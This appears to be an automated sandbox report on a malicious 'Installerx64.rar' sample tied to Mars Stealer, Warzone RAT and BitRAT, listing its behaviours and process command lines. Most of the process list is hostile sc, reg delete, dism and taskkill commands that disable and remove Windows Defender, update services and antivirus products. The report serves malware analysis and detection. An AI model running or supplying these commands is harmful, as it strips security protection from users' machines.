Analysis Overview
SHA256
bccc4ed85a1cca9413814ceaf90a4e12de07e5b0a07963ca6ea0a8b40a926550
Threat Level: Known bad
The file Installerx64.rar was found to be: Known bad.
Malicious Activity Summary
Mars Stealer
WarzoneRat, AveMaria
Modifies security service
BitRAT
Warzone RAT payload
Executes dropped EXE
Stops running service(s)
Loads dropped DLL
Checks computer location settings
Adds Run key to start application
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Program Files directory
Drops file in Windows directory
Launches sc.exe
Enumerates physical storage devices
Suspicious use of SetWindowsHookEx
Modifies registry class
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: CmdExeWriteProcessMemorySpam
Kills process with taskkill
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-01-03 19:43
Signatures
Analysis: behavioral3
Detonation Overview
Submitted
2023-01-03 19:42
Reported
2023-01-03 19:47
Platform
win7-20220901-en
Max time kernel
137s
Max time network
156s
Command Line
Signatures
BitRAT
Mars Stealer
Modifies security service
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Security | C:\Windows\SysWOW64\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Parameters | C:\Windows\SysWOW64\reg.exe | N/A |
WarzoneRat, AveMaria
Warzone RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft.exe | N/A |
| N/A | N/A | C:\Program Files\Builded.exe | N/A |
| N/A | N/A | C:\Program Files\installerX32.exe | N/A |
| N/A | N/A | C:\Program Files\InstallerX64.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft office.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\dismhost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\784DD60B-C17F-4E86-AED3-9D4D425937F5\dismhost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\EB7D771E-B6C3-4321-8F1A-16451039F157\dismhost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\AA47FAFD-C26F-4249-801D-B46DB82C2EA3\dismhost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\62FB9DB2-9133-4809-94F1-C30E850FFA2C\dismhost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\CEB8ED30-4469-43B8-845D-136C5A9ACA43\dismhost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\B9176574-69F7-430A-A225-5140D0BB8FF4\dismhost.exe | N/A |
Stops running service(s)
Loads dropped DLL
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Local\\temp\\svchost" | C:\Program Files\Microsoft office.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program Files\\Microsoft.exe" | C:\Program Files\Microsoft.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft office.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft office.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft office.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft office.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\__tmp_rar_sfx_access_check_7084333 | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx64.exe | N/A |
| File created | C:\Program Files\installerX32.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx64.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft office.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx64.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\MpClient.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\MpOAV.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\en-US\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\MpCommu.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\it-IT\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\de-DE\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\MpAsDesc.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\installerX32.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx64.exe | N/A |
| File created | C:\Program Files\InstallerX64.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx64.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\en-US\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\MpAsDesc.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx64.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\MpCmdRun.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\MsMpLics.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\InstallerX64.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx64.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\en-US\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\MpOAV.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\MpRTP.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\ja-JP\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Program Files\Builded.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx64.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\MpEvMsg.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\MsMpCom.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\en-US\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\es-ES\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\en-US\MsMpRes.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\MsMpLics.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\fr-FR\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\MpClient.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\MpSvc.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Program Files\Microsoft office.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx64.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\MSASCui.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\MsMpRes.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Program Files\Microsoft.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx64.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Builded.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx64.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Windows\system32\Dism.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Users\Admin\AppData\Local\Temp\B9176574-69F7-430A-A225-5140D0BB8FF4\dismhost.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Users\Admin\AppData\Local\Temp\784DD60B-C17F-4E86-AED3-9D4D425937F5\dismhost.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Windows\system32\Dism.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Users\Admin\AppData\Local\Temp\EB7D771E-B6C3-4321-8F1A-16451039F157\dismhost.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Users\Admin\AppData\Local\Temp\CEB8ED30-4469-43B8-845D-136C5A9ACA43\dismhost.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\dismhost.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Users\Admin\AppData\Local\Temp\62FB9DB2-9133-4809-94F1-C30E850FFA2C\dismhost.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Windows\system32\Dism.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Windows\system32\Dism.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Windows\system32\Dism.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Windows\system32\Dism.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Users\Admin\AppData\Local\Temp\AA47FAFD-C26F-4249-801D-B46DB82C2EA3\dismhost.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Windows\system32\Dism.exe | N/A |
Launches sc.exe
Enumerates physical storage devices
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\System32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious behavior: CmdExeWriteProcessMemorySpam
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Microsoft office.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Microsoft office.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft office.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft office.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx64.exe
"C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx64.exe"
C:\Program Files\Microsoft.exe
"C:\Program Files\Microsoft.exe"
C:\Program Files\Builded.exe
"C:\Program Files\Builded.exe"
C:\Program Files\installerX32.exe
"C:\Program Files\installerX32.exe"
C:\Program Files\InstallerX64.exe
"C:\Program Files\InstallerX64.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1BCB.tmp\1BCC.tmp\1BCD.bat "C:\Program Files\InstallerX64.exe""
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1BBC.tmp\1BBD.tmp\1BBE.bat "C:\Program Files\installerX32.exe""
C:\Program Files\Microsoft office.exe
"C:\Program Files\Microsoft office.exe"
C:\Windows\system32\cacls.exe
"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKEY_CLASSES_ROOT\CLSID\{5FDD51E2-A9D0-44CE-8C8D-162BA0C591A0}" /v "Version"
C:\Windows\system32\sc.exe
sc stop windefend
C:\Windows\system32\reg.exe
reg query "HKEY_CLASSES_ROOT\CLSID\{5FDD51E2-A9D0-44CE-8C8D-162BA0C591A0}" /v "Version"
C:\Windows\system32\sc.exe
sc config windefend start= disabled
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\InboxApplications\Microsoft.Windows.SecHealthUI__neutral_neutral_cw5n1h2txyewy" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CLASSES_ROOT\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-AM-Default-Definitions-Package~31bf3856ad364e35~amd64~~\Owners" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CLASSES_ROOT\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-AppLayer-Group-amcore-Package~31bf3856ad364e35~amd64~~\Owners" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-AppLayer-Group-onecore-Package~31bf3856ad364e35~amd64~~\Owners" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-AppLayer-Group-Package~31bf3856ad364e35~amd64~~\Owners" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-ApplicationGuard-Inbox-Package~31bf3856ad364e35~amd64~~\Owners" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Client-Package~31bf3856ad364e35~amd64~~\Owners" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-CloudClean-Group-Package~31bf3856ad364e35~amd64~~\Owners" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Core-Group-amcore-Package~31bf3856ad364e35~amd64~~\Owners" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Core-Group-onecore-Package~31bf3856ad364e35~amd64~~\Owners" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Core-Group-Package~31bf3856ad364e35~amd64~~\Owners" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Group-Policy-Package~31bf3856ad364e35~amd64~~\Owners" /f
C:\Windows\system32\sc.exe
sc delete windefend
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Group-amcore-Package~31bf3856ad364e35~amd64~~\Owners" /f
C:\Windows\system32\sc.exe
sc config WdNisSvc start= disabled
C:\Windows\system32\sc.exe
sc delete WdNisSvc
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-MDM-Group-Package~31bf3856ad364e35~amd64~~\Owners" /f
C:\Windows\system32\sc.exe
sc stop wuauserv
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~\Owners" /f
C:\Windows\system32\sc.exe
sc delete Sense
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Nis-Group-Package~31bf3856ad364e35~amd64~~\Owners" /f
C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Shield-Provider-Core-Package~31bf3856ad364e35~amd64~~\Owners" /f
C:\Windows\system32\sc.exe
sc config Sense start= disabled
C:\Windows\system32\sc.exe
sc stop Sense
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Group-Package~31bf3856ad364e35~amd64~~\Owners" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Group-onecore-Package~31bf3856ad364e35~amd64~~\Owners" /f
C:\Windows\system32\sc.exe
sc stop WdNisSvc
C:\Windows\system32\Dism.exe
dism /online /remove-package /packagename:Windows-Defender-AM-Default-Definitions-Package~31bf3856ad364e35~amd64~~ /NoRestart
C:\Windows\system32\sc.exe
sc stop usosvc
C:\Windows\system32\sc.exe
sc config usosvc start= disabled
C:\Windows\system32\sc.exe
sc stop WaasMedicSvc
C:\Windows\system32\sc.exe
sc config WaasMedicSvc start= disabled
C:\Windows\system32\sc.exe
sc stop SecurityHealthService
C:\Windows\system32\sc.exe
sc config SecurityHealthService start= disabled
C:\Windows\system32\sc.exe
sc delete SecurityHealthService
C:\Windows\system32\sc.exe
sc stop SDRSVC
C:\Windows\system32\sc.exe
sc config SDRSVC start= disabled
C:\Windows\system32\sc.exe
sc stop wscsvc
C:\Windows\system32\sc.exe
sc config wscsvc start= disabled
C:\Windows\system32\sc.exe
sc stop WdiServiceHost
C:\Windows\system32\sc.exe
sc config WdiServiceHost start= disabled
C:\Windows\system32\sc.exe
sc stop WdiSystemHost
C:\Windows\system32\sc.exe
sc config WdiSystemHost start= disabled
C:\Windows\system32\sc.exe
sc stop InstallService
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\dismhost.exe {46B2E577-34B9-4AF4-89A3-F6022FB712B2}
C:\Windows\system32\sc.exe
sc config InstallService Start= disabled
C:\Windows\system32\sc.exe
sc stop VaultSvc
C:\Windows\system32\sc.exe
sc config VaultSvc start= disabled
C:\Windows\system32\sc.exe
sc stop Spooler
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding
C:\Windows\system32\sc.exe
sc config Spooler start= disabled
C:\Windows\system32\sc.exe
sc stop LicenseManager
C:\Windows\system32\sc.exe
sc config LicenseManager start= disabled
C:\Windows\system32\sc.exe
sc stop DiagTrack
C:\Windows\system32\sc.exe
sc config DiagTrack start= disabled
C:\Windows\system32\taskkill.exe
taskkill /f /im smartscreen.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im SecurityHealthService.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im MpCopyAccelerator.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im MpCopyAccelerator.exe
C:\Windows\System32\taskkill.exe
taskkill /f /im SecurityHealthService.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im SystemSettings.exe
C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center" /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center" /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection" /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Security Health" /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdBoot" /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdFilter" /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdNisDrv" /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdNisSvc" /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc" /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v SecurityHealth /f
C:\Windows\SysWOW64\sc.exe
sc delete windefend
C:\Windows\SysWOW64\sc.exe
sc delete sense
C:\Windows\SysWOW64\sc.exe
sc stop nsWscSvc
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im MBAMWsc.exe
C:\Windows\SysWOW64\sc.exe
sc stop MBAMService
C:\Windows\SysWOW64\sc.exe
sc config MBAMService start= disabled
C:\Windows\SysWOW64\sc.exe
sc delete MBAMService
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im MBAM.exe
C:\Windows\SysWOW64\sc.exe
sc stop Bytefenceservice
C:\Windows\SysWOW64\sc.exe
sc config Bytefenceservice start= disabled
C:\Windows\SysWOW64\sc.exe
sc delete Bytefenceservice
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Bytefence.exe
C:\Windows\system32\sc.exe
sc stop "avast! Tools"
C:\Windows\system32\sc.exe
sc config "avast! Tools" start= disabled
C:\Windows\system32\sc.exe
sc delete "avast! Tools"
C:\Windows\system32\sc.exe
sc stop "avast! Antivirus"
C:\Windows\system32\sc.exe
sc config "avast! Antivirus" start= disabled
C:\Windows\system32\Dism.exe
dism /online /remove-package /packagename:Windows-Defender-AppLayer-Group-amcore-Package~31bf3856ad364e35~amd64~~ /NoRestart
C:\Users\Admin\AppData\Local\Temp\784DD60B-C17F-4E86-AED3-9D4D425937F5\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\784DD60B-C17F-4E86-AED3-9D4D425937F5\dismhost.exe {781245A3-F951-4894-B4A2-ECF2FB16E10E}
C:\Windows\system32\Dism.exe
dism /online /remove-package /packagename:Windows-Defender-AppLayer-Group-onecore-Package~31bf3856ad364e35~amd64~~ /NoRestart
C:\Users\Admin\AppData\Local\Temp\EB7D771E-B6C3-4321-8F1A-16451039F157\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\EB7D771E-B6C3-4321-8F1A-16451039F157\dismhost.exe {64056711-BE73-4542-B1B7-39077A9BD8A8}
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\system32\Dism.exe
dism /online /remove-package /packagename:Windows-Defender-AppLayer-Group-Package~31bf3856ad364e35~amd64~~ /NoRestart
C:\Users\Admin\AppData\Local\Temp\AA47FAFD-C26F-4249-801D-B46DB82C2EA3\dismhost.exe
